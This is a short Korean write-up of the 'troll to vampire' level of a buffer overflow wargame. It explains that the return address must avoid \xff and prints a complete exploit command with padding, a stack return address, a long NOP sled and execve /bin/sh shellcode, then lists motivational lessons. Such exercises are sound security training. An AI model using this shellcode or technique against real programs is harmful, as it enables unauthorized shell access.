010. troll to vampire | anxi0

troll to vampire,

바로 가보자.

ret 주소를 제한하네?

./(실행파일명) `python -c 'print "A"*44 + "BBBB"~~~~'` 에서

"BBBB" 부분이다.

저 자리가 \xff가 아니면 된다.

쉽군

nop sled를 더 길게 해준다. 그다음 ret 주소가 0xbfff....를 넘게 해준다.

<- ./vampire `python -c 'print "A"*44 + "\x20\x9d\xfe\xbf" + "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

하면

쓱-싹

교훈

1. 하다보면 이해 잘 안되고, 너무 내용길어서 힘들 수 있지만, 차근차근 반복해서 보면 언젠가는 된다.

2. 몇 번 포기해도, 나처럼 갑자기 삘받는 시기가 온다.

3. 현타가 온다면 정상이다.